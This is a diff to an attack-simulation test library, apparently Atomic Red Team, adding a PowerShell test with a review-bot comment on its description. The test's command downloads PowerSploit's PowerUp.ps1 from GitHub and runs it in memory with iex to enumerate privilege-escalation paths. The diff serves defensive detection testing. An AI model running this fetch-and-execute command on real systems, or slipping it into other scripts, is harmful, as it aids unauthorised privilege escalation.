diff --git a/atomics/Indexes/Indexes-CSV/index.csv b/atomics/Indexes/Indexes-CSV/index.csv
index 04c2305d..73189ebd 100644
--- a/atomics/Indexes/Indexes-CSV/index.csv
+++ b/atomics/Indexes/Indexes-CSV/index.csv
@@ -861,6 +861,7 @@ execution,T1059.001,PowerShell,17,ATHPowerShellCommandLineParameter -EncodedComm
execution,T1059.001,PowerShell,18,ATHPowerShellCommandLineParameter -EncodedCommand parameter variations with encoded arguments,0d181431-ddf3-4826-8055-2dbf63ae848b,powershell
execution,T1059.001,PowerShell,19,PowerShell Command Execution,a538de64-1c74-46ed-aa60-b995ed302598,command_prompt
execution,T1059.001,PowerShell,20,PowerShell Invoke Known Malicious Cmdlets,49eb9404-5e0f-4031-a179-b40f7be385e3,powershell
+execution,T1059.001,PowerShell,21,PowerUp Invoke-AllChecks,1289f78d-22d2-4590-ac76-166737e1811b,powershell
execution,T1059.006,Python,1,Execute shell script via python's command mode arguement,3a95cdb2-c6ea-4761-b24e-02b71889b8bb,sh
execution,T1059.006,Python,2,Execute Python via scripts (Linux),6c4d1dcb-33c7-4c36-a8df-c6cfd0408be8,sh
execution,T1059.006,Python,3,Execute Python via Python executables (Linux),0b44d79b-570a-4b27-a31f-3bf2156e5eaa,sh
diff --git a/atomics/Indexes/Indexes-CSV/windows-index.csv b/atomics/Indexes/Indexes-CSV/windows-index.csv
index 63a59154..c661ed1e 100644
--- a/atomics/Indexes/Indexes-CSV/windows-index.csv
+++ b/atomics/Indexes/Indexes-CSV/windows-index.csv
@@ -607,6 +607,7 @@ execution,T1059.001,PowerShell,17,ATHPowerShellCommandLineParameter -EncodedComm
execution,T1059.001,PowerShell,18,ATHPowerShellCommandLineParameter -EncodedCommand parameter variations with encoded arguments,0d181431-ddf3-4826-8055-2dbf63ae848b,powershell
execution,T1059.001,PowerShell,19,PowerShell Command Execution,a538de64-1c74-46ed-aa60-b995ed302598,command_prompt
execution,T1059.001,PowerShell,20,PowerShell Invoke Known Malicious Cmdlets,49eb9404-5e0f-4031-a179-b40f7be385e3,powershell
+execution,T1059.001,PowerShell,21,PowerUp Invoke-AllChecks,1289f78d-22d2-4590-ac76-166737e1811b,powershell
execution,T1053.005,Scheduled Task,1,Scheduled Task Startup Script,fec27f65-db86-4c2d-b66c-61945aee87c2,command_prompt
execution,T1053.005,Scheduled Task,2,Scheduled task Local,42f53695-ad4a-4546-abb6-7d837f644a71,command_prompt
execution,T1053.005,Scheduled Task,3,Scheduled task Remote,2e5eac3e-327b-4a88-a0c0-c4057039a8dd,command_prompt
diff --git a/atomics/Indexes/Indexes-Markdown/index.md b/atomics/Indexes/Indexes-Markdown/index.md
index b0fa87ba..4e56b5be 100644
--- a/atomics/Indexes/Indexes-Markdown/index.md
+++ b/atomics/Indexes/Indexes-Markdown/index.md
@@ -1499,6 +1499,7 @@
- Atomic Test #18: ATHPowerShellCommandLineParameter -EncodedCommand parameter variations with encoded arguments [windows]
- Atomic Test #19: PowerShell Command Execution [windows]
- Atomic Test #20: PowerShell Invoke Known Malicious Cmdlets [windows]
+ - Atomic Test #21: PowerUp Invoke-AllChecks [windows]
- [T1059.006 Python](../../T1059.006/T1059.006.md)
- Atomic Test #1: Execute shell script via python's command mode arguement [linux]
- Atomic Test #2: Execute Python via scripts (Linux) [linux]
diff --git a/atomics/Indexes/Indexes-Markdown/windows-index.md b/atomics/Indexes/Indexes-Markdown/windows-index.md
index 3b7aa2c0..9ca1d1bb 100644
--- a/atomics/Indexes/Indexes-Markdown/windows-index.md
+++ b/atomics/Indexes/Indexes-Markdown/windows-index.md
@@ -1075,6 +1075,7 @@
- Atomic Test #18: ATHPowerShellCommandLineParameter -EncodedCommand parameter variations with encoded arguments [windows]
- Atomic Test #19: PowerShell Command Execution [windows]
- Atomic Test #20: PowerShell Invoke Known Malicious Cmdlets [windows]
+ - Atomic Test #21: PowerUp Invoke-AllChecks [windows]
- T1059.006 Python [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1053.005 Scheduled Task](../../T1053.005/T1053.005.md)
- Atomic Test #1: Scheduled Task Startup Script [windows]
diff --git a/atomics/Indexes/index.yaml b/atomics/Indexes/index.yaml
index db076360..253451ca 100644
--- a/atomics/Indexes/index.yaml
+++ b/atomics/Indexes/index.yaml
@@ -62185,6 +62185,19 @@ execution:
"function $cmdlets { Write-Host Pretending to invoke $cmdlets }"}
foreach ($cmdlets in $malcmdlets) {
$cmdlets}
+ - name: PowerUp Invoke-AllChecks
+ auto_generated_guid: 1289f78d-22d2-4590-ac76-166737e1811b
+ description: 'Check for privilege escalation paths using PowerUp from PowerShellMafia
+
+'
+ supported_platforms:
+ - windows
+ executor:
+ command: |
+ [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
+ iex(iwr https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/d943001a7defb5e0d1657085a77a0e78609be58f/Privesc/PowerUp.ps1 -UseBasicParsing)
+ Invoke-AllChecks
+ name: powershell
T1059.006:
technique:
external_references:
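Review bot: The new `PowerUp Invoke-AllChecks` entry's `description` does not tell an operator what the test does on the host or what a defender should expect to see. The `command` block fetches PowerUp.ps1 from raw.githubusercontent.com at run time and evaluates it in memory with `iex`, and the same commands are repeated in the T1059.001.md hunk. Pinning the URL to a full commit hash is good, since the fetched content cannot change under the test. I would extend the description to something like `Downloads PowerUp.ps1 (pinned commit) and runs Invoke-AllChecks in memory; requires outbound HTTPS to raw.githubusercontent.com. Expect PowerShell script block logging (Event ID 4104) and AMSI/AV detections for PowerUp.` This index looks generated, so the edit presumably belongs in the technique's source YAML, where a prerequisite check for network reachability would also help the test fail clearly in an isolated lab.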
diff --git a/atomics/T1059.001/T1059.001.md b/atomics/T1059.001/T1059.001.md
index 635b00d7..39446b03 100644
--- a/atomics/T1059.001/T1059.001.md
+++ b/atomics/T1059.001/T1059.001.md
@@ -50,6 +50,8 @@ PowerShell commands/scripts can also be executed without directly invoking the <
- [Atomic Test #20 - PowerShell Invoke Known Malicious Cmdlets](#atomic-test-20---powershell-invoke-known-malicious-cmdlets)
+- [Atomic Test #21 - PowerUp Invoke-AllChecks](#atomic-test-21---powerup-invoke-allchecks)
+
@@ -842,4 +844,34 @@ foreach ($cmdlets in $malcmdlets) {
+
+
+
+## Atomic Test #21 - PowerUp Invoke-AllChecks
+Check for privilege escalation paths using PowerUp from PowerShellMafia
+
+**Supported Platforms:** Windows
+
+
+**auto_generated_guid:** 1289f78d-22d2-4590-ac76-166737e1811b
+
+
+
+
+
+
+#### Attack Commands: Run with `powershell`!
+
+
+```powershell
+[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
+iex(iwr https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/d943001a7defb5e0d1657085a77a0e78609be58f/Privesc/PowerUp.ps1 -UseBasicParsing)
+Invoke-AllChecks
+```
+
+
+
+
+
+